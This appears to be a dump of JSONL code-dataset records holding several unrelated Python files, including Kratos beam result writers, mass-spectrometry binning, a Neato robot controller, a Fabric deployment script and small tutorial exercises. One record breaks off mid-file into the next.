0:\n                line_ptr.Attributes().SetColor(f'#ff0000')\n            else:\n                line_ptr.Attributes().SetColor(f'#0000ff')\n\n            line_ptr = geometry.Add(an.Line3D(a=x_old_mt, b=np.add(x, mt)))\n            line_ptr.Attributes().SetLayer(f'Moment Mt')\n            if data[i][7] <= 0:\n                line_ptr.Attributes().SetColor(f'#ff0000')\n            else:\n                line_ptr.Attributes().SetColor(f'#0000ff')\n            x_old_mt = np.add(x, mt)\n\n\n            if data[i][0] == 1:\n                break\n\n            i -= 1\n\n    def print_displacement(self, Id=None):\n        act_curve_geometry = self.curve_geometry.Clone()\n\n        #Header\n        print('\\nDisplacements of ' + str(self.key))\n\n        if Id is not None:\n            node = self.nodes[Id]\n            print(\n                f\"{'Id:':<4}{Id:<4}\",\n                f\"{'x:':<4}{node.X - node.X0:<30}\" ,\n                f\"{'y:':<4}{node.Y - node.Y0:<30}\" ,\n                f\"{'z:':<4}{node.Z - node.Z0:<30}\" ,\n                f\"{'r:':<4}{node.GetSolutionStepValue(DISPLACEMENT_ROTATION):<30}\" ,\n                )\n\n        else:\n            for k, pole in enumerate(act_curve_geometry.Poles()):\n                node = self.nodes[k]\n                print(\n                    f\"{'Id:':<4}{k:<4}\",\n                    f\"{'x:':<4}{node.X - node.X0:<30}\" ,\n                    f\"{'y:':<4}{node.Y - node.Y0:<30}\" ,\n                    f\"{'z:':<4}{node.Z - node.Z0:<30}\" ,\n                    f\"{'r:':<4}{node.GetSolutionStepValue(DISPLACEMENT_ROTATION):<30}\" ,\n                    )\n\n    def write_displacement(self, nstep=0):\n        act_curve_geometry = self.curve_geometry.Clone()\n\n        with open('displacements.txt', 'a') as stream:\n            print('# Kratos Output Displacements \\n#', file=stream)\n            print('# ' + str(self.curve_geometry_ptr.Key()), file=stream)\n            print(f'# solution step :: {nstep}', file=stream)\n            print('{:>4s}'.format('# Id')+\n                  '{:>31s}'.format('Init x:')+\n                  '{:>31s}'.format('Init y:')+\n                  '{:>31s}'.format('Init z:')+\n                  '{:>31s}'.format('Init rotation:')+\n                  '{:>31s}'.format('Disp x')+\n                  '{:>31s}'.format('Disp y')+\n                  '{:>31s}'.format('Disp z')+\n                  '{:>31s}'.format('Disp rotation')\n                  , file=stream\n                  )\n\n            print('#', end='', file=stream)\n            for i in range(251):\n                print('*', end='', file=stream)\n            print('#', file=stream)\n\n            for k, pole in enumerate(act_curve_geometry.Poles()):\n                node = self.nodes[k]\n\n                print(f'{k+1:>4d}',\n                      f'{node.X0:>30}',\n                      f'{node.Y0:>30}',\n                      f'{node.Z0:>30}',\n                      
f'{node.GetValue(DISPLACEMENT_ROTATION):>30}',\n                      f'{node.X - node.X0:>30}',\n                      f'{node.Y - node.Y0:>30}',\n                      f'{node.Z - node.Z0:>30}',\n                      f'{node.GetSolutionStepValue(DISPLACEMENT_ROTATION):>30}', file=stream\n                    #   '\\n'\n                      )\n\n        stream.close()\n\n        # # benchmark output \n        # with open('benchmark_m3.txt', 'r+') as m3:\n        #     data_m3 = m3.read()\n\n        # with open('benchmark_mt.txt', 'r+') as mt:\n        #     data_mt = mt.read()\n\n        # node = self.nodes[-1]\n        # with open('benchmark.txt', 'a') as bm:\n        #     print(f'{k+1:>4d}',\n        #         f'{node.Z - node.Z0:>30}',\n        #         f'{node.GetSolutionStepValue(DISPLACEMENT_ROTATION):>30}',\n        #         f'{data_m3:>30}',\n        #         f'{data_mt:>30}',\n        #         file=bm )\n\n\n    def make_header(self, nstep=0):\n        header = open('kratos_data.txt', 'a')\n        header.write('#\\n' + '# Kratos Output \\n#')\n        header.write(f'\\n# solution step :: {nstep} \\n')\n        header.write('{:>4s}'.format('# Id')+\n                     '{:>20s}'.format('Gauss x:')+\n                     '{:>20s}'.format('Gauss y:')+\n                     '{:>20s}'.format('Gauss z:')+\n                     '{:>30s}'.format('Normal Force:')+\n                     '{:>30s}'.format('Moment My:')+\n                     '{:>30s}'.format('Moment Mz:')+\n                     '{:>30s}'.format('Moment Mt:')+\n                     '{:>30s}'.format('local frame T:')+\n                     '{:>10s}'.format('x')+\n                     '{:>21s}'.format('y')+\n                     '{:>21s}'.format('z')+\n                     '{:>30s}'.format('local frame N:')+\n                     '{:>10s}'.format('x')+\n                     '{:>21s}'.format('y')+\n                     '{:>21s}'.format('z')+\n                     '{:>30s}'.format('local frame V:')+\n                     '{:>10s}'.format('x')+\n                     '{:>21s}'.format('y')+\n                     '{:>21s}'.format('z')\n                     )\n        header.write('\\n#')\n\n        for i in range(434):\n            header.write('*')\n        header.write('\\n#\\n')\n\n        header.close()\n\n    def make_header_results(self, nstep=0):\n        header = open('results.txt', 'a')\n        header.write('#\\n' + '# Kratos Output Forces \\n#')\n        header.write(f'\\n# solution step :: {nstep} \\n')\n        header.write('{:>4s}'.format('# Id')+\n                     '{:>20s}'.format('Normal Force:')+\n                     '{:>20s}'.format('Moment My:')+\n                     '{:>20s}'.format('Moment Mz:')+\n                     '{:>20s}'.format('Moment Mt:')+\n                     '{:>20s}'.format('local frame T:')+\n                     '{:>10s}'.format('x')+\n                     '{:>21s}'.format('y')+\n                     '{:>21s}'.format('z')+\n                     '{:>20s}'.format('local frame N:')+\n                     '{:>10s}'.format('x')+\n                     '{:>21s}'.format('y')+\n                     '{:>21s}'.format('z')+\n                     '{:>20s}'.format('local frame V:')+\n                     '{:>10s}'.format('x')+\n                     '{:>21s}'.format('y')+\n                     '{:>21s}'.format('z')\n                     )\n        header.write('\\n#')\n\n        for i in range(304):\n            header.write('*')\n        header.write('\\n#\\n')\n\n        header.close()\n\n        with open('kratos_postprocess.txt', 'r+') as kratos_data:\n            content = kratos_data.read()\n\n        p_stream = open('kratos_postprocess.txt', 'w')\n        p_stream.write('#\\n' + '# Kratos Point Evaluation \\n#')\n        p_stream.write(f'\\n# solution step :: {nstep} \\n')\n        p_stream.write('{:>4s}'.format('# Id')+\n                     '{:>30s}'.format('Normal Force:')+\n                     '{:>30s}'.format('Moment My:')+\n                     '{:>30s}'.format('Moment Mz:')+\n                     '{:>30s}'.format('Moment Mt:')+\n                     '{:>30s}'.format('Rotation 2:')+\n                     '{:>30s}'.format('Rotation 3:')+\n                     '{:>20s}'.format('local frame T:')+\n                     '{:>21s}'.format('x')+\n                     '{:>21s}'.format('y')+\n                     '{:>21s}'.format('z')+\n                     '{:>20s}'.format('local frame N:')+\n                     '{:>21s}'.format('x')+\n                     '{:>21s}'.format('y')+\n                     '{:>21s}'.format('z')+\n                     '{:>20s}'.format('local frame V:')+\n                     '{:>21s}'.format('x')+\n                     '{:>21s}'.format('y')+\n                     '{:>21s}'.format('z')\n                     )\n        p_stream.write('\\n#')\n\n        for i in range(304):\n            p_stream.write('*')\n        p_stream.write('\\n#\\n')\n\n        p_stream.write(content)\n\n        p_stream.close()\n\n    def write_results(self, nstep=0):\n        fname = 'kratos_data.txt'\n        data = np.loadtxt(fname, dtype={'names': ('Id', 'x', 'y', 'z', 'N', 'M2', 'M3', 'Mt', 't_0', 
't_1', 't_2', 'a2_0', 'a2_1', 'a2_2', 'a3_0', 'a3_1', 'a3_2'),\n                        'formats': ('i4', 'f4', 'f4' , 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4', 'f4')}\n                        , skiprows=0)\n\n\n        self.make_header_results(nstep)\n\n        with open('results.txt', 'a') as stream:\n\n            i = len(data) -1\n            while data[i][0] >= 0:\n                print(f\"{data['Id'][i]:>4d}\",\n                      f\"{data['N'][i]:>20f}\",\n                      f\"{data['M2'][i]:>20f}\",\n                      f\"{data['M3'][i]:>20f}\",\n                      f\"{data['Mt'][i]:>20f}\",\n                      f\"{data['t_0'][i]:>30f}\",\n                      f\"{data['t_1'][i]:>21f}\",\n                      f\"{data['t_2'][i]:>21f}\",\n                      f\"{data['a2_0'][i]:>30f}\",\n                      f\"{data['a2_1'][i]:>21f}\",\n                      f\"{data['a2_2'][i]:>21f}\",\n                      f\"{data['a3_0'][i]:>30f}\",\n                      f\"{data['a3_1'][i]:>21f}\",\n                      f\"{data['a3_2'][i]:>21f}\",\n                      file=stream\n                      )\n\n                if data[i][0] == 1:\n                    break\n\n                i -= 1\n\n        # stream.close()\n\n    def clear_memory(self):\n        open('results.txt', 'w').close()\n        open('kratos_data.txt', 'w').close()\n        open('frames.txt', 'w').close()\n        open('displacements.txt', 'w').close()\n        open('kratos_postprocess.txt', 'w').close()\n\n\n","repo_name":"LukasRauch/BeamValiadation","sub_path":"pathon_anurbs/kratos_utilities.py","file_name":"kratos_utilities.py","file_ext":"py","file_size_in_byte":46087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8120720256","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 25 16:28:49 2021\n\n@author: leoicarus\n\"\"\"\nimport pandas as pd\nimport math\n\n\ndef collect_bins(bin_width,bin_precision,pre_result):\n\tresult={}\n\ttotal_fraction_number=len(pre_result)\n\tfor fraction in list(pre_result.keys()):\n\t\ttotal_sample_number=len(pre_result[fraction])\n\t\tfor sample_name in list(pre_result[fraction].keys()):\n\t\t\tprint('step_3:',sample_name,fraction)\n\t\t\tsample=pre_result[fraction][sample_name]\n\t\t\tsample.loc[:,'sample']=sample_name\n\t\t\tsample.loc[:,'fraction']=fraction\n\t\t\t\n\t\t\tfor index in sample.index:\n\t\t\t\tmass=sample.loc[index]['Tmz']\n\t\t\t\tmass_f=round(float(mass),bin_precision)\n\t\t\t\tbin_1_f=mass_f-bin_width+(1/math.pow(10,bin_precision))\n\t\t\t\twhile bin_1_f<=mass_f:\n\t\t\t\t\tbin_2_f=bin_1_f+bin_width\n\t\t\t\t\tbin_1=str(round(bin_1_f,bin_precision))\n\t\t\t\t\tbin_2=str(round(bin_2_f,bin_precision))\n\t\t\t\t\tbatch_number=int(bin_1_f*math.pow(10,bin_precision)/1000)\n\t\t\t\t\tnew_key=bin_1+'_'+bin_2\n\t\t\t\t\tif not batch_number in result.keys():\n\t\t\t\t\t\tresult[batch_number]={}\n\t\t\t\t\tif not new_key in result[batch_number].keys():\n\t\t\t\t\t\tresult[batch_number][new_key]=sample.loc[[index]]\n\t\t\t\t\telse:\n\t\t\t\t\t\tresult[batch_number][new_key]=pd.concat([result[batch_number][new_key],sample.loc[[index]]],ignore_index=True)\n\t\t\t\t\tbin_1_f=bin_1_f+(1/math.pow(10,bin_precision))\n\tresult_all={}\n\tfor batch_number in result.keys():\n\t\tresult_all.update(result[batch_number])\n\treturn result_all,total_fraction_number,total_sample_number\n\n","repo_name":"PHOENIXcenter/deeprtalign","sub_path":"deeprtalign/collect_mass_information_shift_bins_no_disk.py","file_name":"collect_mass_information_shift_bins_no_disk.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"22307484533","text":"#!/usr/bin/env python3\n\n#The keyword def defines a function, and it will always include parentheses even if no \n#arguments are passed. 
Also, notice the use of a default argument.\n\ndef function(n = 0):\n    print(n)\n    \n#A function must be called\nfunction(47)\n\n#All functions return a value\nx = function()\nprint(x)\n\n#Prime numbers are positive, and are bigger than 1, and its factors are only 1 and itself\ndef is_prime(n):\n    if n <= 1:\n        return False\n    for x in range(2, n):\n        if n % x == 0:\n            return False\n    return True\n    \ndef list_primes():\n    for n in range(100):\n        if is_prime(n):\n            print(n, end=' ', flush=True)\n    print()\n\nlist_primes() ","repo_name":"carlosgramos/python-essential-training","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28547052423","text":"import pandas as pd\r\nimport numpy as np\r\nfrom extract import get_exchange_rate\r\n\r\n# setting float and column width parameters\r\npd.set_option('display.float_format', '{:.10f}'.format)\r\npd.set_option('display.max_colwidth', None)\r\n\r\n# the function below appends \"https://coinmarketcap.com\" to every crypto pair.\r\n# this makes it a weblink, where more information can be gathered regarding the crypto pair.\r\ndef add_full_link(dataframe):\r\n    base_link = \"https://coinmarketcap.com\"\r\n    dataframe['Href'] = dataframe['Href'].apply([lambda x: base_link + x])\r\n    return dataframe\r\n\r\n# the function below converts scraped text in string format into float - use for price\r\ndef convert_to_float(dataframe, column):\r\n    try: \r\n        dataframe[column] = dataframe[column].astype(float)\r\n    except ValueError as e:\r\n        error_price = str(e).split(\"'\")[1]\r\n        dataframe.loc[dataframe[column] == error_price, [column]] = 0.000000002131\r\n    return dataframe\r\n\r\n# the function below converts scraped text in string format into integer - use for volume\r\ndef convert_to_int(dataframe, column):\r\n    dataframe[column] = dataframe[column].apply([lambda x : x.replace(',','')]).astype(int)\r\n    return dataframe\r\n\r\n# the function uses the scraped AUD/USD exchange rate to convert USD into AUD\r\ndef convert_to_aud(dataframe):\r\n    exchange_rate = get_exchange_rate()\r\n    dataframe['Price'] = dataframe['Price'].astype(float)\r\n    dataframe[['Price', 'Volume']] = dataframe[['Price', 'Volume']]*exchange_rate\r\n    return dataframe\r\n\r\n# the function executes all the above functions to return a transformed dataframe\r\ndef transform_data(dataframe):\r\n    dataframe = add_full_link(dataframe)\r\n    dataframe = convert_to_float(dataframe, 'Price')\r\n    dataframe = convert_to_int(dataframe, 'Volume')\r\n    dataframe = convert_to_aud(dataframe)\r\n    return dataframe\r\n","repo_name":"usamatrq94/Prefect-ECSAgent-Deploy","sub_path":"transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37327976475","text":"#!/usr/bin/python\n#coding: utf8\n\n\"\"\"\nImports\n\"\"\"\nimport time\nimport math\nimport serial\nimport atexit, termios # for keyboard reads\nimport sys, os # for keyboard reads\nfrom test_NeatoCommands import envia # \"envia\" function sends commands to Neato and returns Neato response, in case we need it\nimport numpy as np\n\n# Inverse Kinematics Computation\ndef inverseKinematics(Vc, S, Tita_dot, Ts):\n\tvelR = Vc + ( S * Tita_dot) # mm/s\n\tvelL = Vc + (-S * Tita_dot) # mm/s\n\tdistancia_L = (velL * 10 * Ts) # mm\n\tdistancia_R = (velR * 10 * Ts) # mm\n\tmaxSpeed = 
max(abs(velL), abs(velR))\n\n\t# Command generation and sending\n\tif velL == 0 and velR == 0:\n\t\tenvia(ser,'SetMotor LWheelDisable RWheelDisable', 0.01,False)\n\t\tenvia(ser,'SetMotor LWheelEnable RWheelEnable', 0.01,False)\n\telse:\n\t\tcomando = 'SetMotor ' + str(distancia_L) + ' ' + str(distancia_R) + ' ' + str(maxSpeed)\n\t\tenvia(ser,comando, 0.01,False)\n\n### angular difference function angdiff\ndef angdiff(TH1, TH2):\n\tdiff = TH1 - TH2\n\tdiff = (diff + np.pi) % (2 * np.pi) - np.pi\n\treturn diff\n\n# Go to point\n# Error vector, distance\ndef goToPoint(goal, currentPose, Kv, Kh, r, S, ts):\n\tcurrentPose_out = currentPose\n\n\t## differential-drive kinematics helpers\n\tI_kine = lambda v_x, psi, r, S: [(1/r)*v_x + (1/r)*S*psi, (1/r)*v_x - (1/r)*S*psi]\n\todo_vel = lambda phi_r, phi_l, r, S, ts: [(1/2)*r*(phi_r+phi_l)*ts, (r/(2*S))*(phi_r-phi_l)*ts]\n\tPose_int = lambda X_ant, odo: [X_ant[0] + odo[0]*np.cos(X_ant[2]), X_ant[1] + odo[0]*np.sin(X_ant[2]), X_ant[2] + odo[1]]\n\n\tstop = False\n\twhile not stop:\n\t\tprint(currentPose)\n\t\t\n\t\tcurrentdiff = [goal[0] - currentPose[0], goal[1] - currentPose[1]]\n\t\tthrottle = np.sqrt(currentdiff[0]**2 + currentdiff[1]**2)\n\t\tif throttle < 0.1:\n\t\t\tstop = True\n\t\t\tcurrentPose_out = currentPose\n\t\t\treturn currentPose_out\n\t\telse:\n\t\t\t### VC\n\t\t\tvelocity = throttle * Kv\n\t\t\t### THETA DOT\n\t\t\tsteering = np.arctan2(currentdiff[1], currentdiff[0])\n\t\t\tpsi = angdiff(steering, currentPose[2]) * Kh\n\t\t\tphi_l_r = I_kine(velocity, psi, r, S)\n\t\t\tdeltas = odo_vel(phi_l_r[0], phi_l_r[1], r, S, ts)\n\t\t\tprint(deltas)\n\t\t\tcurrentPose = Pose_int(currentPose, [deltas[0], deltas[1]])\n\t\tinverseKinematics(velocity, S, psi, ts) # command the robot with the computed turn rate psi\n\treturn currentPose_out\n\n\"\"\"\nfunction getch_nonBlock\nTries to read from the keyboard.\nReturns a list with all pressed keys that are pending to be read.\nThe list holds the ASCII numeric value of each key. Example: if you press 'a', a 97 is appended to the list.\nIf no key has been pressed, the function returns IMMEDIATELY with an EMPTY LIST.\n\"\"\"\ndef getch_nonBlock():\n\ttry:\n\t\told_settings_in = termios.tcgetattr(sys.stdin)\n\t\told_settings_out = termios.tcgetattr(sys.stdout)\n\t\tnew_settings_in = old_settings_in\n\t\tnew_settings_in[3] = new_settings_in[3] & ~termios.ECHO & ~termios.ICANON # lflags\n\t\tnew_settings_in[6][termios.VMIN] = 0  # cc array. NonCanonical behaviour values\n\t\tnew_settings_in[6][termios.VTIME] = 0 # cc array. 
NonCanonical behaviour values\n\t\ttermios.tcsetattr(sys.stdin, termios.TCSADRAIN, new_settings_in)\n\t\t\n\t\tch_set = []\n\t\tch = os.read(sys.stdin.fileno(), 1)\n\t\twhile ch is not None and len(ch) > 0:\n\t\t\tch_set.append(ord(ch[0]))\n\t\t\tch = os.read(sys.stdin.fileno(), 1)\n\n\tfinally:\n\t\ttermios.tcsetattr(sys.stdin, termios.TCSADRAIN, old_settings_in)\n\t\ttermios.tcsetattr(sys.stdout, termios.TCSADRAIN, old_settings_out)\n\n\treturn ch_set\n\n\n\n# Entry point\nif __name__ == '__main__':\n\n\tglobal ser\n\t# Open the Serial Port.\n\tser = serial.Serial(port='/dev/ttyACM0', baudrate=115200, timeout=1)\n\n\tenvia(ser,'TestMode On', 0.2)\n\tenvia(ser,'PlaySound 1', 0.2)\n\tenvia(ser,'SetMotor LWheelEnable RWheelEnable', 0.2)\n\n\t# Declaration of the robot-related variables: dimensions, differential kinematics, etc.\n\tTs=0.1 # each control-loop iteration runs every Ts seconds\n\tS = 121.5 # mm\n\tVc = 0 # mm/s\n\tTita_dot = 0 # rad/s\n\t\n\t# Initial conditions\n\tposeX=0 # mm\n\tposeY=0 # mm\n\tposeTita=0 # rad\n\n\t# Initialize variables\n\t\n\n\tstartPose = [0, 0, 0] # startPose [x y theta]\n\tpuntos = [[3, 5]] # path of waypoints the robot will pass through\n\tgoal = [0, -2] # goal position\n\n\tKv = 0.9 # Velocity Gain. Units (m/s)/m = [1/s]\n\tKh = 4 # Head Gain. Units [1/s]\n\tr = 0.1 # wheels radius\n\t#S = 0.26 # half of the distance between the wheels' center\n\tts = 0.1 # sample time\n\t\n\t\"\"\"\n\t# Initialization of the robot odometry variables, for later computation of the pose evolution\n\tmsg = envia(ser, 'GetMotors LeftWheel RightWheel', 0.01, False).split('\\n')\n\todoL = int(msg[4].split(',')[1])\n\todoR = int(msg[8].split(',')[1])\n\t\"\"\"\n\n\tstartTime = time.time()\n\tcurrentTime = startTime\n\n\n\tprint(\"\")\n\tprint(\"TIME = \",currentTime-startTime)\n\n\n\t### run gotopoint\n\n\tcurrentPose = [poseX, poseY, poseTita]\n\n\tpoints = [3, 5]\n\n\n\n\t# Loop over the coordinates\n\t#for i in range(1, len(points)):\n\t\t# Get the goal coordinate and currentPose\n\t\t#goal = points(i)\n\t\t# Call the function with the appropriate parameters\n\t\t#currentPose = goToPoint(goal, currentPose, Kv, Kh, r, S, ts)\n\n\t\n\t# Control Loop. It executes every Ts seconds, useful for doing tasks that must be executed periodically (e.g. Forward Kinematics for Pose integration)\n\twhile True:\n\t\t# Wait until the next Control Loop can be started\n\t\tnextTime = currentTime+Ts\n\t\twhile (time.time()
Arguments:\\n{1!r}\"\n message = template.format(type(ex).__name__, ex.args)\n print(message)\n \n \nvisit_tool()\n\ntime.sleep(5)\ndriver.quit()\n","repo_name":"mujib2953/uscis_case_status","sub_path":"uscis.py","file_name":"uscis.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"12368924278","text":"import time\nimport getpass\nfrom fabric.api import env, roles, execute, run, sudo, puts\nfrom fabric.context_managers import cd, settings, prefix\nfrom fabric.contrib.files import append\nfrom fabric.contrib.console import confirm\n\n\n# Get Mac username and use it for sudo actions\nUSERNAME = ''.join(ch for ch in getpass.getuser() if ch.isalnum())\n\n### Configuration options start. ###\nPROJECT_NAME = '{{project_name}}' # Dir name that contains the settings dir\nPROJECT_REPO = 'git@github.com:pixeldomain/{{project_name}}.git'\nSERVER = 'pixeldomain.co.uk'\nDOMAIN = '{{project_name}}.pixeldomain.co.uk'\nGUNICORN_PORT = '80??'\n#USERNAME = '' # use if your local login is not the same as remote\n### Configuration options end. ###\n\nVIRTUAL_ENVS = '/home/production/venv'\n\nenv.user = 'production'\nenv.roledefs = {\n 'web_workers': [SERVER, ],\n 'database': [SERVER, ],\n 'sudo_actions': ['{0}@{1}'.format(USERNAME, DOMAIN), ]\n}\nenv.root_path = '/home/production/public_html/{0}'.format(PROJECT_NAME)\n\n\ndef deploy():\n \"\"\"Deploys to the live server.\"\"\"\n\n # Setup\n env.release = time.strftime('%Y%m%d%H%M%S')\n deployment_tasks = []\n\n # Options\n opt_initial = confirm('Is this the initial deployment?', default=False)\n if not opt_initial:\n opt_update_deps = confirm('Update pip dependencies?', default=False)\n\n opt_migrate_database = confirm('Sync and migrate database?', default=False)\n opt_take_offline = False\n if opt_migrate_database:\n opt_take_offline = confirm(('Take site offline during '\n 'sync and migration?'), default=True)\n\n opt_restart_web_workers = confirm('Restart web workers?', default=True)\n\n # Queue up deployment tasks\n if opt_initial:\n deployment_tasks.append(initial_deployment)\n deployment_tasks.append(create_supervisor_config)\n deployment_tasks.append(create_gunicorn_config)\n else:\n deployment_tasks.append(get_latest_release)\n if opt_update_deps:\n deployment_tasks.append(update_dependencies)\n\n if not confirm('Preparation complete, continue?', default=True):\n return\n\n if opt_migrate_database:\n if opt_take_offline:\n deployment_tasks.append(stop_web_workers)\n deployment_tasks.append(symlink_current_release)\n deployment_tasks.append(sync_and_migrate)\n else:\n deployment_tasks.append(symlink_current_release)\n\n deployment_tasks.append(collect_static)\n\n if opt_restart_web_workers or opt_take_offline:\n if opt_take_offline:\n deployment_tasks.append(start_web_workers)\n else:\n deployment_tasks.append(restart_web_workers)\n\n # Run tasks\n for task in deployment_tasks:\n execute(task)\n\n\n@roles('web_workers')\ndef update_dependencies():\n with cd('{0}/source/requirements'.format(env.root_path)):\n with prefix('source {0}/{1}/bin/activate'.format(\n VIRTUAL_ENVS, PROJECT_NAME)):\n run('pip install -r production.txt')\n\n\n@roles('web_workers')\ndef initial_deployment():\n \"\"\"Initial deployment tasks.\n\n Create the required directories, checkout the source code and install\n dependencies.\n \"\"\"\n\n run('mkdir {0}'.format(env.root_path))\n with cd(env.root_path):\n run('mkdir config')\n run('mkdir releases')\n run('mkdir 
releases/current')\n run('mkdir releases/previous')\n run('mkdir media')\n run('mkdir static')\n run('git clone {0} source'.format(PROJECT_REPO))\n\n with cd(VIRTUAL_ENVS):\n run('virtualenv {0}'.format(PROJECT_NAME))\n\n update_dependencies()\n\n\n@roles('web_workers')\ndef get_latest_release():\n \"\"\"Get the latest stable version of the code.\n\n Create an archive from the current Git master branch, place it in a new\n release folder, then symlink the release folders.\n \"\"\"\n\n run('mkdir {0}/releases/{1}'.format(env.root_path, env.release))\n with cd('{0}/source'.format(env.root_path)):\n run('git pull origin master')\n run('git archive master | tar -xm -C {0}/releases/{1}'.format(\n env.root_path, env.release))\n\n run('ln -s /home/production/public_html/{0}/media '\n '/home/production/public_html/{1}/releases/{2}/src/'.format(\n PROJECT_NAME, PROJECT_NAME, env.release))\n run('ln -s /home/production/public_html/{0}/static '\n '/home/production/public_html/{1}/releases/{2}/src/'.format(\n PROJECT_NAME, PROJECT_NAME, env.release))\n\n\n@roles('web_workers')\ndef symlink_current_release():\n \"\"\"Symlink Release to live folder.\"\"\"\n\n with settings(warn_only=True):\n with cd('{0}'.format(env.root_path)):\n run('rm releases/previous -R')\n run('mv releases/current releases/previous')\n run('ln -s {0} releases/current'.format(env.release))\n\n\n@roles('database')\ndef sync_and_migrate():\n \"\"\"Sync and migrate the database.\"\"\"\n\n with cd('{0}/releases/current/src'.format(env.root_path)):\n with prefix('source {0}/{1}/bin/activate'.format(\n VIRTUAL_ENVS, PROJECT_NAME)):\n\n # Only warn on migration errors; for some reason migrate kicks up a fuss otherwise\n with settings(warn_only=True):\n run('python manage.py migrate '\n '--settings={0}.settings.live'.format(PROJECT_NAME))\n\n\n@roles('web_workers')\ndef collect_static():\n \"\"\"Run manage.py collectstatic.\"\"\"\n\n with cd('{0}/releases/{1}/src'.format(env.root_path, env.release)):\n with prefix('source {0}/{1}/bin/activate'.format(\n VIRTUAL_ENVS, PROJECT_NAME)):\n run('python manage.py collectstatic '\n '--noinput '\n '--settings={0}.settings.live'.format(PROJECT_NAME))\n\n\n@roles('sudo_actions')\ndef stop_web_workers():\n sudo('supervisorctl stop {0}'.format(PROJECT_NAME))\n\n\n@roles('sudo_actions')\ndef start_web_workers():\n sudo('supervisorctl start {0}'.format(PROJECT_NAME))\n\n\n@roles('sudo_actions')\ndef restart_web_workers():\n sudo('supervisorctl reload')\n\n\n@roles('sudo_actions')\ndef create_supervisor_config():\n config = \"\"\"[program:%(project)s]\ndirectory = /home/production/public_html/%(project)s/releases/current/src\nuser = production\ncommand = /home/production/public_html/%(project)s/config/gunicorn.sh\nstdout_logfile = /home/production/logs/logfile_supervisor_%(project)s\nstderr_logfile = /home/production/logs/errlog_supervisor_%(project)s\n\"\"\" % ({'project': PROJECT_NAME})\n path = '/etc/supervisor/conf.d/{0}.conf'.format(PROJECT_NAME)\n append(path, config, use_sudo=True)\n sudo('supervisorctl reload')\n\n\n@roles('web_workers')\ndef create_gunicorn_config():\n config = \"\"\"#!/bin/bash\nset -e\n\nLOGFILE=/home/production/logs/logfile_gunicorn_%(project)s\nLOGDIR=$(dirname $LOGFILE)\nNUM_WORKERS=3\n# user/group to run as\nUSER=production\nGROUP=webmaster\nADDRESS=127.0.0.1:%(port)s\nDJANGO_SETTINGS_MODULE=%(project)s.settings.live\n\ncd /home/production/public_html/%(project)s/releases/current/src\nsource /home/production/venv/%(project)s/bin/activate\nexport DJANGO_SETTINGS_MODULE=$DJANGO_SETTINGS_MODULE\n\nexec gunicorn 
%(project)s.wsgi:application \\\\\n --workers=$NUM_WORKERS \\\\\n --bind=$ADDRESS \\\\\n --user=$USER --group=$GROUP \\\\\n --log-level=debug \\\\\n --error-logfile=$LOGFILE\n\"\"\" % ({'project': PROJECT_NAME, 'port': GUNICORN_PORT})\n path = '/home/production/public_html/{0}/config/gunicorn.sh'.format(\n PROJECT_NAME)\n append(path, config)\n run('chmod +x {0}'.format(path))\n puts('Now create the database and set the environment variables.')\n","repo_name":"pixeldomain/django-project-template","sub_path":"fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":7601,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"9655744546","text":"# Create organic balls using text.\n\nsize(600, 600)\n\nfont('Zapfino')\nfontsize(72)\n\n# Draw a black background. Setting the background to None\n# gives an empty background.\nbackground(0)\n\n# Move to the center of the composition. Note that, because\n# we use Zapfino, the ball will end up off-center.\ntranslate(WIDTH/2,HEIGHT/2)\nfor i in range(100):\n # The trick is skewing, rotating and scaling without\n # moving so all elements share the same centerpoint.\n push()\n # Select a value between (0,0,0) (black) and (1,0,0) (red).\n fill(random(),0,0)\n rotate(random(0,800))\n scale(random()*2)\n skew(random(200))\n text('(',0,0)\n pop()","repo_name":"nodebox/nodebox-pyobjc","sub_path":"examples/Text/OrganicBall.py","file_name":"OrganicBall.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"21"} +{"seq_id":"14309076196","text":"\nclass Call(object):\n\tdef __init__(self, unique_id, caller_name, caller_phone, call_time, call_reason):\n\t\tself.unique_id = unique_id\n\t\tself.caller_name = caller_name\n\t\tself.caller_phone = caller_phone\n\t\tself.call_time = call_time\n\t\tself.call_reason = call_reason\n\t\tself.call = [self.unique_id, self.caller_name, self.caller_phone, self.call_time, self.call_reason]\n\tdef display(self):\n\t\tprint (\"ID: \" + str(self.unique_id))\n\t\tprint (\"Call: \" + self.caller_name)\n\t\tprint (\"Caller phone: \"+ self.caller_phone)\n\t\tprint (\"Call Time: \" + self.call_time)\n\t\tprint (\"Reason: \" + self.call_reason)\n\t\tprint (self.call)\n\nclass CallCenter(object):\n\tdef __init__(self):\n\t\tself.queue = []\n\t\tself.queue_size = 0\n\tdef add(self, call):\n\t\t# append the new call to the back of the queue and grow the counter\n\t\tself.queue.append(call)\n\t\tself.queue_size += 1\n\t\tprint (self.queue)\n\t\treturn self\n\tdef remove(self):\n\t\t# pop the call at the front of the queue (FIFO) and shrink the counter\n\t\tself.queue.pop(0)\n\t\tself.queue_size -= 1\n\t\treturn self\n\tdef info(self):\n\t\tprint (self.queue)\n\t\tprint (\"name: \")\n\t\tprint (\"number: \")\n\t\tprint (\"Queue size =\" + str(self.queue_size))\n\ncall1 = Call(1, \"MaryAnne\", \"555-5555\", \"7:34 PM\", \"Out of coconuts\")\ncall1.display()\n\ncall2 = Call(2, \"Gilligan\", \"555-5556\", \"7:37 PM\", \"Kidnapped by an 